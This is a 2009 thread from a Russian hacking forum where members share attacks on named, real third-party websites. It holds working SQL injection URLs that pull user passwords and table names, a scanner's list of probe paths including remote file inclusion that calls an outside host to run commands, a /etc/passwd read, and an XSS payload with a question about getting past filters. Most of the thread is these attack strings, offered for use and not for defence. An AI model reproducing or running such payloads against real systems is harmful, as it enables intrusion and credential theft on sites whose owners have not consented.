HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.06.2009, 15:52
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+where+table_name=0x75736572
Юзай хекс, читай статьи. Тебе же линк дали!
 
Ответить с цитированием

  #2  
Старый 15.06.2009, 17:05
Fisher2003
Новичок
Регистрация: 10.06.2009
Сообщений: 4
С нами: 8904867

Репутация: 0
По умолчанию

Кто нибудь покажите где здесь уязвимость?

Найдено: /?PageServices
Найдено: /?wp-cs-dump
Найдено: /?wp-html-rend
Найдено: /?wp-stop-ver
Найдено: /?wp-uncheckout
Найдено: /?wp-usr-prop
Найдено: /?wp-ver-diff
Найдено: /?wp-verify-link
Найдено: /?wp-ver-info
Найдено: /index.php?IDAdmin=test
Найдено: /index.php?base=test
Найдено: /index.php?SqlQuery=test
Найдено: index.php?tampon=test
Найдено: /index.php?name=Members_List&letter=All&sortby=pass
Найдено: /index.php?name=Members_List&letter=All&sortby=uid
Найдено: /server-status/
Найдено: /index.php?name=Web_Links&ratinglid=96&ratinguser=? &ratinghost_name=?&rating=999999999999999999999 99
Найдено: index.php?module=calendar&calendar[view]=month&month=11&year=9
Найдено: /index.php?do=ext&page=http://bugdurito.narod.ru/cmd.php&cmd=id
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: index.php?a=lostpw&set=1&session_id=`
Найдено: /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=
Найдено: /index.php?method=`
Найдено: /index.php?a=lostpw&set=1&id=`
Найдено: /index.php?a=lostpw&set=1&session_id=`
Найдено: /?page='
Найдено: /?page=shop/cart&func=cartAdd&product_id='
Найдено: /?page=shop/browse&category_id=&offset='
Найдено: /?page=admin/index&GulfTech=">
Найдено: /index.php?option=content&task=view&id='
i vot eshe
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
 
Ответить с цитированием

  #3  
Старый 15.06.2009, 17:08
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

а полный линк не хошь выложить?
 
Ответить с цитированием

  #4  
Старый 15.06.2009, 18:20
Fisher2003
Новичок
Регистрация: 10.06.2009
Сообщений: 4
С нами: 8904867

Репутация: 0
По умолчанию

Цитата:
Сообщение от Rubaka  
а полный линк не хошь выложить?
Да пожайлуста

ka4ni.ру

Скажи и мне что там мона сделать особенно вот с этим
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
 
Ответить с цитированием

  #5  
Старый 15.06.2009, 18:48
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
С нами: 9221480

Репутация: 55
По умолчанию

ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'
 
Ответить с цитированием

  #6  
Старый 15.06.2009, 19:23
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Цитата:
Сообщение от molotovkeyt  
ПР 6.
Не расковырял.
http://www.libyaonline.com/business/details.php?id=1'
Заурядная скуля

http://www.libyaonline.com/business/details.php?id=9846+and+1=if(ascii(substring((sele ct+user_password+from+users+limit+0,1),1,1))>1,1,0 )

Рядом есть с выводом

http://www.libyaonline.com/music/artist.php?id=-64+union+select+1,user_password,3,4,5,6+from+users +limit+0,1--+


Валемир, я думаю что нет
 
Ответить с цитированием

  #7  
Старый 15.06.2009, 18:50
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

isher2003, Да ничего, просто двиг, при нахождении некоторых символов орет - хакинг аттемпт (т.е. попытка взлома).

Последний раз редактировалось mailbrush; 15.06.2009 в 18:58..
 
Ответить с цитированием

  #8  
Старый 15.06.2009, 23:47
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
 
Ответить с цитированием

  #9  
Старый 16.06.2009, 00:44
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от YuNi|[c  
привет. Возможно ли через xss баг произвести sql инъекцию, если да то как?
Нет.

Цитата:
Сообщение от farpost  
Кто чем ищет логи (конфиги итд....) апача при LFI?
http://forum.antichat.ru/thread49775.html
 
Ответить с цитированием

  #10  
Старый 16.06.2009, 06:57
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от mailbrush  
Нет.


http://forum.antichat.ru/thread49775.html
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
Вы еще скажите мне на запросе
Код:
1>"><ScRiPt%20%0a%0d>alert(401223179617)%3B</ScRiPt>
вместо номера 401223179617 фильтруется символы, как обходит этого? Чем зашифроват запрос?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.